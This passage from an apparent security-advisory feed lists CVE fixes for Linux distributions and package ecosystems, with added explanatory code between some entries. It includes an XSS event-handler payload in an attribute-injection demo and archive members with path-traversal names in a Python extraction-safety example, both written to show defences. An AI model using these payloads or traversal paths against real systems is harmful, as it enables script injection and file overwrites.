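        render_img(xmlattr_hardened, payload)
    except ValueError as exc:
        print("hardened:", exc)
```

The vulnerable variant renders the payload as `<img x onerror=alert(1) y="1" src="/static/logo.png">`, a working event-handler injection with no quotes needed in the key. Note that the fix is a rejection, not an escape: there is no safe encoding of a space inside an attribute name, so the only correct response to such a key is to raise.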
22.05.2024 03:00:00redhat[RHSA-2024:3105] python3.11-cryptography security update (moderate)The python-cryptography packages contain a Python Cryptographic Authority's (PyCA's) cryptography library, which provides cryptographic primitives and recipes to Python developers.Security Fix(es):* python-cryptography: NULL-dereference when loading PKCS7 certificates (CVE-2023-49083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3105
22.05.2024 03:00:00redhat[RHSA-2024:3120] freeglut security update (moderate)freeglut is a completely open source alternative to the OpenGL Utility Toolkit (GLUT) library with an OSI approved free software license.Security Fix(es):* freeglut: memory leak via glutAddSubMenu() function (CVE-2024-24258)* freeglut: memory leak via glutAddMenuEntry() function (CVE-2024-24259)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3120
22.05.2024 03:00:00redhat[RHSA-2024:3139] squashfs-tools security update (moderate)SquashFS is a highly compressed read-only file system for Linux. These packages contain the utilities for manipulating squashfs file systems.Security Fix(es):* squashfs-tools: unvalidated filepaths allow writing outside of destination (CVE-2021-40153)* squashfs-tools: possible Directory Traversal via symbolic link (CVE-2021-41072)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3139
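The two squashfs-tools CVEs above are the two classic shapes of archive path traversal: a member name that climbs out of the destination with `..` (CVE-2021-40153), and a symlink member extracted first so that a later member is written *through* it to a location outside the destination (CVE-2021-41072). The added example below is not squashfs-tools code and does not parse the squashfs format; it is a small extractor over a constructed member list (name, kind, payload) that shows the containment check a practitioner wants, namely resolving every target with `realpath` after earlier members have already been placed on disk so that symlinks created by the archive are followed before the check, and it runs in a temporary directory.

```python
import os
import tempfile


def resolve_member(dest_root, member_path):
    """Return the absolute on-disk path a member would be written to, or None if it
    would land outside dest_root.

    realpath() is evaluated against the current state of dest_root, so a symlink
    that an earlier member created is followed before the containment check.
    Absolute member names are treated as relative to the extraction root.
    """
    root = os.path.realpath(dest_root)
    candidate = os.path.realpath(os.path.join(root, member_path.lstrip("/")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def extract(dest_root, members):
    """members: iterable of (name, kind, payload); kind is 'file' (payload=bytes)
    or 'symlink' (payload=link target). Returns (written, rejected) member names."""
    written, rejected = [], []
    for name, kind, payload in members:
        target = resolve_member(dest_root, name)
        if target is None:
            rejected.append(name)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        if kind == "symlink":
            # The link itself stays inside dest_root; the damage would only come
            # from a later member written through it, which resolve_member catches.
            os.symlink(payload, target)
        else:
            with open(target, "wb") as fh:
                fh.write(payload)
        written.append(name)
    return written, rejected


def demo():
    """Constructed image listing with both traversal shapes; returns what was
    written, what was rejected, and any stray files that escaped above dest."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "out")
        os.mkdir(dest)
        members = [
            ("etc/motd", "file", b"hello\n"),
            ("../outside.txt", "file", b"escaped\n"),          # dot-dot traversal
            ("link", "symlink", tmp),                          # link to parent of dest
            ("link/pwned.txt", "file", b"escaped via link\n"), # write through the link
        ]
        written, rejected = extract(dest, members)
        strays = sorted(n for n in os.listdir(tmp) if n != "out")
        return written, rejected, strays


if __name__ == "__main__":
    print(demo())
```

Expected result: `etc/motd` and `link` are written, `../outside.txt` and `link/pwned.txt` are rejected, and nothing appears next to the extraction directory. A stricter policy would also refuse the symlink member itself when its target resolves outside the root; the example keeps it so that the second, symlink-assisted traversal is visible being blocked at the point where the write would occur.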
22.05.2024 03:00:00redhat[RHSA-2024:3166] openssh security update (moderate)OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* openssh: scp allows command injection when using backtick characters in the destination argument (CVE-2020-15778)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3166
22.05.2024 03:00:00redhat[RHSA-2024:3178] linux-firmware security update (important)The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* hw: intel: Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi (CVE-2022-46329)* hw: amd: INVD instruction may lead to a loss of SEV-ES guest machine memory integrity problem (CVE-2023-20592)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3178
22.05.2024 03:00:00redhat[RHSA-2024:3184] grub2 security update (moderate)The grub2 packages provide version 2 of the Grand Unified Boot Loader (GRUB), a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices.Security Fix(es):* grub2: grub2-set-bootflag can be abused by local (pseudo-)users (CVE-2024-1048)* grub2: Out-of-bounds write at fs/ntfs.c may lead to unsigned code execution (CVE-2023-4692)* grub2: out-of-bounds read at fs/ntfs.c (CVE-2023-4693)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3184
22.05.2024 03:00:00redhat[RHSA-2024:3203] systemd security update (moderate)The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit.Security Fix(es):* systemd-resolved: Unsigned name response in signed zone is not refused when DNSSEC=yes (CVE-2023-7008)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3203
22.05.2024 03:00:00redhat[RHSA-2024:3233] libssh security update (low)libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* libssh: ProxyCommand/ProxyJump features allow injection of malicious code through hostname (CVE-2023-6004)* libssh: Missing checks for return values for digests (CVE-2023-6918)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3233
22.05.2024 03:00:00redhat[RHSA-2024:3254] container-tools:rhel8 security update (important)The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* buildah: full container escape at build time (CVE-2024-1753)* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)* golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786)* jose-go: improper handling of highly compressed data (CVE-2024-28180)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3254
22.05.2024 03:00:00redhat[RHSA-2024:3258] xorg-x11-server security update (moderate)X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3258
22.05.2024 03:00:00redhat[RHSA-2024:3259] go-toolset:rhel8 security update (important)Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)* golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289)* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)* golang: net/mail: comments in display names are incorrectly handled (CVE-2024-24784)* golang: html/template: errors returned from MarshalJSON methods may break template escaping (CVE-2024-24785)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3259
22.05.2024 03:00:00redhat[RHSA-2024:3261] tigervnc security update (important)Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3261
22.05.2024 03:00:00redhat[RHSA-2024:3268] krb5 security update (low)Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* krb5: Memory leak at /krb5/src/lib/rpc/pmap_rmt.c (CVE-2024-26458)* krb5: Memory leak at /krb5/src/lib/gssapi/krb5/k5sealv3.c (CVE-2024-26461)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3268
22.05.2024 03:00:00redhat[RHSA-2024:3270] sssd security update (moderate)The System Security Services Daemon (SSSD) service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch (NSS) and the Pluggable Authentication Modules (PAM) interfaces toward the system, and a pluggable back-end system to connect to multiple different account sources.Security Fix(es):* sssd: Race condition during authorization leads to GPO policies functioning inconsistently (CVE-2023-3758)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3270
22.05.2024 03:00:00redhat[RHSA-2024:3271] bind and dhcp security update (important)The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.Security Fix(es):* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)Bug Fix:* dhcp rebuilt after API change of bind-export-libs. For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3271
23.05.2024 19:27:42ubuntu[USN-6785-1] GNOME Remote Desktop vulnerabilityGNOME Remote Desktop would allow unintended access to sensitive informationor remote desktop connections.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6785-1
23.05.2024 16:00:48ubuntu[USN-6784-1] cJSON vulnerabilities (high)cJSON could be made to crash if it received specially craftedinput.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6784-1
23.05.2024 17:23:33maven[MAVEN:GHSA-HJFC-6JXR-J2RX] Eclipse Ditto vulnerable to Cross-site Scripting (moderate)In Eclipse Ditto starting in version 3.0.0 and prior to versions 3.4.5 and 3.5.6, the user input of several input fields of the Eclipse Ditto Explorer User Interface https://eclipse.dev/ditto/user-interface.html was not properly neutralized and thus vulnerable to both Reflected and Stored XSS (Cross Site Scripting).Several inputs were not persisted at the backend of Eclipse Ditto, but only in local browser storage to save settings of "environments" of the UI and e.g. the last performed "search queries", resulting in a "Reflected XSS" vulnerability.However, several other inputs were persisted at the backend of Eclipse Ditto, leading to a "Stored XSS" vulnerability. Those mean that authenticated and authorized users at Eclipse Ditto can persist Things in Ditto which can - when being displayed by other users also being authorized to see those Things in the Eclipse Ditto UI - cause scripts to be executed in the browser of other users.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HJFC-6JXR-J2RX
23.05.2024 15:02:46ubuntu[USN-6777-4] Linux kernel (HWE) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6777-4
23.05.2024 12:28:52ubuntu[USN-6736-2] klibc vulnerabilities (critical)Several security issues were fixed in klibc.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6736-2
23.05.2024 12:27:17ubuntu[USN-6663-3] OpenSSL updateAdd implicit rejection in PKCS#1 v1.5 in OpenSSL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6663-3
23.05.2024 03:00:00cisa[CISA-2024:0523] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0523
23.05.2024 03:00:00 | redhat | [RHSA-2024:3304] libreoffice security fix update (important) | LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite. Security Fix(es): * libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3304
23.05.2024 03:00:00 | redhat | [RHSA-2024:3341] gdk-pixbuf2 security update (moderate) | The gdk-pixbuf2 packages provide an image loading library that can be extended by loadable modules for new image formats. It is used by toolkits such as GTK+ or clutter. Security Fix(es): * gdk-pixbuf2: heap memory corruption on gdk-pixbuf (CVE-2022-48622). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3341
23.05.2024 03:00:00 | redhat | [RHSA-2024:3343] xorg-x11-server-Xwayland security update (important) | Xwayland is an X server for running X clients under Wayland. Security Fix(es): * xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080) * xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081) * xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3343
23.05.2024 03:00:00 | redhat | [RHSA-2024:3307] tomcat security and bug fix update (important) | Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. Security Fix(es): * Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549) * Apache Tomcat: WebSocket DoS with incomplete closing handshake (CVE-2024-23672). Bug Fix(es) and Enhancement(s): * Rebase tomcat to version 9.0.87 (JIRA:RHEL-34815) * Amend tomcat's changelog so that fixed CVEs are mentioned explicitly (JIRA:RHEL-35328). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3307
23.05.2024 03:00:00 | redhat | [RHSA-2024:3340] .NET 7.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.119 and .NET Runtime 7.0.19. Security Fix(es): * dotnet: stack buffer overrun in Double Parse (CVE-2024-30045) * dotnet: denial of service in ASP.NET Core due to deadlock in Http2OutputProducer.Stop() (CVE-2024-30046). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3340
23.05.2024 03:00:00 | redhat | [RHSA-2024:3344] glibc security update (important) | The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Security Fix(es): * glibc: stack-based buffer overflow in netgroup cache (CVE-2024-33599) * glibc: null pointer dereferences after failed netgroup cache insertion (CVE-2024-33600) * glibc: netgroup cache may terminate daemon on memory allocation failure (CVE-2024-33601) * glibc: netgroup cache assumes NSS callback uses in-buffer strings (CVE-2024-33602). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3344
23.05.2024 03:00:00 | redhat | [RHSA-2024:3345] .NET 8.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.105 and .NET Runtime 8.0.5. Security Fix(es): * dotnet: stack buffer overrun in Double Parse (CVE-2024-30045) * dotnet: denial of service in ASP.NET Core due to deadlock in Http2OutputProducer.Stop() (CVE-2024-30046). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3345
23.05.2024 03:00:00 | redhat | [RHSA-2024:3346] git-lfs security update (important) | Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server. Security Fix(es): * golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288) * golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289) * golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290) * golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3346
23.05.2024 03:00:00 | redhat | [RHSA-2024:3347] python3 security update (important) | Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597) * python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3347
23.05.2024 18:02:46 | go | [GO-2024-2571] Invalid block proposal in github.com/cosmos/cosmos-sdk | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2571
24.05.2024 23:09:40 | maven | [MAVEN:GHSA-HFG7-J82C-FR3W] Soot Infinite Loop vulnerability (high) | An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS). | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HFG7-J82C-FR3W
24.05.2024 22:47:56 | go | [GO-2024-2879] Dapr API Token Exposure in github.com/dapr/dapr (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2879
24.05.2024 22:00:29 | maven | [MAVEN:GHSA-W8CP-FRXC-55PJ] Kwik does not discard unused encryption keys (moderate) | Kwik commit 745fd4e2 does not discard unused encryption keys. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W8CP-FRXC-55PJ
24.05.2024 21:52:11 | maven | [MAVEN:GHSA-CW5R-JX8R-9F7X] Jenkins Report Info Plugin Path Traversal vulnerability (moderate) | Jenkins Report Info Plugin 1.2 and earlier does not perform path validation of the workspace directory while serving report files. Additionally, Report Info Plugin does not support distributed builds. This results in a path traversal vulnerability, allowing attackers with Item/Configure permission to retrieve Surefire failures, PMD violations, Findbugs bugs, and Checkstyle errors on the controller file system by editing the workspace path. As of publication of this advisory, there is no fix. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CW5R-JX8R-9F7X
24.05.2024 17:45:20 | npm | [NPM:GHSA-2QJP-FG8C-G878] vxe-table Cross-site Scripting vulnerability (low) | A vulnerability, which was classified as problematic, has been found in xuliangzhan vxe-table up to 3.7.9. This issue affects the function export of the file packages/textarea/src/textarea.js of the component vxe-textarea. The manipulation of the argument inputValue leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.7.10 is able to address this issue. The patch is named d70b0e089740b65a22c89c106ebc4627ac48a22d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-266123. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2QJP-FG8C-G878
24.05.2024 17:45:05 | npm | [NPM:GHSA-3965-HPX2-Q597] Pug allows JavaScript code execution if an application accepts untrusted input (high) | Pug through 3.0.2 allows JavaScript code execution if an application accepts untrusted input for the name option of the `compileClient`, `compileFileClient`, or `compileClientWithDependenciesTracked` function. NOTE: these functions are for compiling Pug templates into JavaScript, and there would typically be no reason to allow untrusted callers. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3965-HPX2-Q597
24.05.2024 03:00:00 | debian | [DSA-5698-1] ruby-rack (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5698-1
24.05.2024 03:00:00 | debian | [DSA-5697-1] chromium | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5697-1
24.05.2024 03:00:00 | debian | [DSA-5699-1] redmine (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5699-1
24.05.2024 03:00:00 | jenkins | [JENKINS:SECURITY-3250] Stored XSS vulnerability in `teamconcert-git` (high) | `teamconcert-git` 2.0.4 and earlier does not escape the Rational Team Concert (RTC) server URI on the build page when showing changes. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs. `teamconcert-git` 2.0.5 escapes the Rational Team Concert (RTC) server URI on the build page when showing changes. | https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3250
24.05.2024 03:00:00 | jenkins | [JENKINS:SECURITY-3070] Path traversal vulnerability in `report-info` (medium) | `report-info` 1.2 and earlier does not perform path validation of the workspace directory while serving report files. Additionally, `report-info` does not support distributed builds. This results in a path traversal vulnerability, allowing attackers with Item/Configure permission to retrieve Surefire failures, PMD violations, Findbugs bugs, and Checkstyle errors on the controller file system by editing the workspace path. As of publication of this advisory, there is no fix. | https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3070
24.05.2024 03:00:00 | jenkins | [JENKINS:SECURITY-3278] XXE vulnerabilities in `hp-application-automation-tools-plugin` (high) | `hp-application-automation-tools-plugin` 24.1.0 and earlier does not configure its XML parsers to prevent XML external entity (XXE) attacks. This allows attackers able to control the input files for `hp-application-automation-tools-plugin` build steps and post-build steps to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. `hp-application-automation-tools-plugin` 24.1.1-beta disables external entity resolution for its XML parsers. NOTE: The fix is currently available only as a beta release. Beta releases will not appear in the regular update center but can be found in the experimental update center. For more information on how to install a beta release, see the documentation at /doc/developer/publishing/releasing-experimental-updates/#using-the-experimental-update-center. | https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3278
24.05.2024 03:00:00 | jenkins | [JENKINS:SECURITY-3277] Missing permission checks in `hp-application-automation-tools-plugin` (medium) | `hp-application-automation-tools-plugin` 24.1.0 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to enumerate ALM jobs configurations, ALM Octane configurations and Service Virtualization configurations. `hp-application-automation-tools-plugin` 24.1.1-beta requires Item/Configure permission to enumerate ALM jobs configurations, ALM Octane configurations and Service Virtualization configurations. NOTE: The fix is currently available only as a beta release. Beta releases will not appear in the regular update center but can be found in the experimental update center. For more information on how to install a beta release, see the documentation at /doc/developer/publishing/releasing-experimental-updates/#using-the-experimental-update-center. | https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3277
25.05.2024 03:00:00 | freebsd | [FREEBSD:04E78F32-04B2-4C23-BFAE-72600842D317] electron29 -- use after free in Dawn | Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-4948. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:04E78F32-04B2-4C23-BFAE-72600842D317
25.05.2024 03:00:00 | freebsd | [FREEBSD:43D1C381-A3E5-4A1D-B3ED-F37B61A451AF] electron28 -- multiple vulnerabilities | Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-4948. Security: backported fix for CVE-2024-3914. Security: backported fix for CVE-2024-4060. Security: backported fix for CVE-2024-4058. Security: backported fix for CVE-2024-4558. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:43D1C381-A3E5-4A1D-B3ED-F37B61A451AF
27.05.2024 18:33:26 | ubuntu | [USN-6673-3] python-cryptography vulnerability (high) | python-cryptography could be made to crash if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6673-3
28.05.2024 22:06:59 | ubuntu | [USN-6795-1] Linux kernel (Intel IoTG) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6795-1
28.05.2024 19:08:11 | ubuntu | [USN-6792-1] Flask-Security vulnerability (medium) | Flask-Security could be made to bypass URL validation and redirect to an arbitrary URL. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6792-1
28.05.2024 18:47:59 | maven | [MAVEN:GHSA-G3HR-P86P-593H] OpenAPI Generator Online - Arbitrary File Read/Delete (high) | Impact: Attackers can exploit the vulnerability to read and delete files and folders from an arbitrary, writable directory as anyone can set the output folder when submitting the request via the `outputFolder` option. Patches: The issue was fixed via https://github.com/OpenAPITools/openapi-generator/pull/18652 (included in v7.6.0 release) by removing the usage of the `outputFolder` option. Workarounds: No workaround available. References: No other reference available. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G3HR-P86P-593H
28.05.2024 18:29:21 | ubuntu | [USN-6794-1] FRR vulnerabilities | Several security issues were fixed in FRR. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6794-1
28.05.2024 16:39:27 | ubuntu | [USN-6793-1] Git vulnerabilities (critical) | Several security issues were fixed in Git. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6793-1
28.05.2024 16:28:29 | ubuntu | [USN-6787-1] Jinja2 vulnerability (medium) | Jinja2 could allow cross-site scripting (XSS) attacks. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6787-1
28.05.2024 14:34:52 | ubuntu | [USN-6791-1] Unbound vulnerability | Unbound could be made to take part in a denial of service attack. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6791-1
28.05.2024 14:24:30 | ubuntu | [USN-6790-1] amavisd-new vulnerability | amavisd-new could be made to bypass security measures. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6790-1
28.05.2024 14:07:12 | ubuntu | [USN-6789-1] LibreOffice vulnerability | LibreOffice could be made to run programs when clicking a graphic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6789-1
28.05.2024 13:49:42 | ubuntu | [USN-6788-1] WebKitGTK vulnerabilities | Several security issues were fixed in WebKitGTK. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6788-1
